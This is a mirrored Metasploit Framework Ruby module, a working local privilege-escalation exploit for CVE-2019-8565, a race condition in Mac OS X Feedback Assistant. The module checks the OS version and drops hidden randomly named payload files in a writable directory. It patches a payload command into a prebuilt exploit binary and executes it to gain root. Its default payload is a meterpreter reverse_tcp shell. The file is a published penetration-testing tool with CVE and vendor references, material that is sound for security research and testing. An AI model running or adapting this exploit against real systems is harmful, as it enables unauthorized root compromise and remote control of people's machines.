Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/osx/local/feedback_assistant_root.rb
32534 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Local

7
  Rank = ExcellentRanking

8


9
  include Msf::Post::File

10
  include Msf::Post::OSX::Priv

11
  include Msf::Post::OSX::System

12
  include Msf::Exploit::EXE

13
  include Msf::Exploit::FileDropper

14


15
  def initialize(info = {})

16
    super(

17
      update_info(

18
        info,

19
        'Name' => 'Mac OS X Feedback Assistant Race Condition',

20
        'Description' => %q{

21
          This module exploits a race condition vulnerability in Mac's Feedback Assistant.

22
          A successful attempt would result in remote code execution under the context of

23
          root.

24
        },

25
        'License' => MSF_LICENSE,

26
        'Author' => [

27
          'CodeColorist', # Discovery and exploit

28
          'timwr', # Metasploit module

29
        ],

30
        'References' => [

31
          ['CVE', '2019-8565'],

32
          ['URL', 'http://web.archive.org/web/20190423083938/https://medium.com/0xcc/rootpipe-reborn-part-ii-e5a1ffff6afe'],

33
          ['URL', 'https://support.apple.com/en-in/HT209600'],

34
          ['URL', 'https://github.com/ChiChou/sploits'],

35
        ],

36
        'SessionTypes' => [ 'meterpreter', 'shell' ],

37
        'DefaultTarget' => 0,

38
        'DefaultOptions' => { 'PAYLOAD' => 'osx/x64/meterpreter/reverse_tcp' },

39
        'Targets' => [

40
          [ 'Mac OS X x64 (Native Payload)', { 'Arch' => ARCH_X64, 'Platform' => [ 'osx' ] } ],

41
          [ 'Python payload', { 'Arch' => ARCH_PYTHON, 'Platform' => [ 'python' ] } ],

42
          [ 'Command payload', { 'Arch' => ARCH_CMD, 'Platform' => [ 'unix' ] } ],

43
        ],

44
        'DisclosureDate' => '2019-04-13',

45
        'Notes' => {

46
          'Reliability' => UNKNOWN_RELIABILITY,

47
          'Stability' => UNKNOWN_STABILITY,

48
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

49
        }

50
      )

51
    )

52
    register_advanced_options [

53
      OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])

54
    ]

55
  end

56


57
  def upload_executable_file(filepath, filedata)

58
    print_status("Uploading file: '#{filepath}'")

59
    write_file(filepath, filedata)

60
    chmod(filepath)

61
    register_file_for_cleanup(filepath)

62
  end

63


64
  def check

65
    version = get_system_version

66


67
    return CheckCode::Unknown('Could not retrieve OSX version') if version.blank?

68


69
    version = Rex::Version.new(version)

70


71
    if version >= Rex::Version.new('10.14.4')

72
      return CheckCode::Safe("OSX version #{version} is not vulnerable.")

73
    end

74


75
    CheckCode::Appears("OSX version #{version} appears vulnerable.")

76
  end

77


78
  def exploit

79
    if check != CheckCode::Appears

80
      fail_with Failure::NotVulnerable, 'Target is not vulnerable'

81
    end

82


83
    if is_root?

84
      fail_with Failure::BadConfig, 'Session already has root privileges'

85
    end

86


87
    unless writable? datastore['WritableDir']

88
      fail_with Failure::BadConfig, "#{datastore['WritableDir']} is not writable"

89
    end

90


91
    case target['Arch']

92
    when ARCH_X64

93
      payload_file = "#{datastore['WritableDir']}/.#{Rex::Text.rand_text_alpha_lower(6..12)}"

94
      binary_payload = Msf::Util::EXE.to_osx_x64_macho(framework, payload.encoded)

95
      upload_executable_file(payload_file, binary_payload)

96
      root_cmd = payload_file

97
    when ARCH_PYTHON

98
      root_cmd = "echo \"#{payload.encoded}\" | python"

99
    else

100
      root_cmd = payload.encoded

101
    end

102
    root_cmd += " & \0"

103
    if root_cmd.length > 1024

104
      fail_with Failure::PayloadFailed, "Payload size (#{root_cmd.length}) exceeds space in payload placeholder"

105
    end

106


107
    exploit_data = File.binread(File.join(Msf::Config.data_directory, 'exploits', 'CVE-2019-8565', 'exploit'))

108
    placeholder_index = exploit_data.index('ROOT_PAYLOAD_PLACEHOLDER')

109
    exploit_data[placeholder_index, root_cmd.length] = root_cmd

110


111
    exploit_file = "#{datastore['WritableDir']}/.#{Rex::Text.rand_text_alpha_lower(6..12)}"

112
    upload_executable_file(exploit_file, exploit_data)

113


114
    print_status("Executing exploit '#{exploit_file}'")

115
    result = cmd_exec(exploit_file)

116
    print_status("Exploit result:\n#{result}")

117
  end

118
end

119


120